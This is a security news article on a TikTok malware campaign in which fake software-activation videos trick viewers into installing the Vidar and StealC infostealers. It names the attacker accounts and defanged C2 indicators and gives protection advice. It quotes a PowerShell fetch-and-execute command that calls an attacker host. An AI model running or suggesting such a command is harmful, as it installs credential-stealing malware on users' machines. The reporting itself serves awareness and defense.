Cybercriminals are now using popular TikTok videos to spread dangerous malware called Vidar and StealC. This marks a new trend in social engineering attacks.
The attackers create videos that look like helpful guides. They show users how to unlock premium features or activate software like Windows, Microsoft Office, CapCut, and Spotify. However, these videos actually trick viewers into running malicious PowerShell commands that infect their systems.
How the Attack Works
Unlike traditional methods that use phishing emails or infected websites, this campaign relies completely on video content. The videos are often faceless and may be created using AI. They contain no harmful code in the TikTok platform itself, making them hard to detect.
Viewers are asked to run a PowerShell command like:
iex (irm https://allaivo[.]me/spotify)
This command downloads and runs a remote script. The script hides itself in system folders and adds those folders to Windows Defender’s exclusion list to avoid detection. It then downloads the Vidar and StealC malware.
What the Malware Does
Once installed, the malware steals sensitive information such as:
- Saved passwords
- Cryptocurrency wallets
- Authentication cookies
It also connects to hidden command-and-control servers to send the stolen data. Vidar uses public platforms like Steam and Telegram to disguise its real network traffic.
For example, it hides data exchanges through:
- Steam profile: hxxps://steamcommunity[.]com/profiles/76561199846773220
- Telegram channel: hxxps://t[.]me/v00rd
Reach and Impact
Researchers at Trend Micro discovered several TikTok accounts involved, including:
- @gitallowed
- @zane.houghton
- @allaivo2
- @sysglow.wow
- @alexfixpc
- @digitaldreams771
One of these videos received over 500,000 views, 20,000 likes, and 100 comments, showing the scale of the campaign.
Victims of this malware risk losing personal data, banking credentials, and company access details. This could lead to account takeovers, fraud, and larger cyberattacks on businesses.
Protecting Yourself
This campaign shows how social media can be used to spread malware in new ways. The videos appear helpful, but they are designed to build trust and trick users into running dangerous commands.
Users should be cautious of any technical advice they see online, especially instructions that ask them to use PowerShell or download unknown software. If in doubt, always verify the source or consult an IT professional.
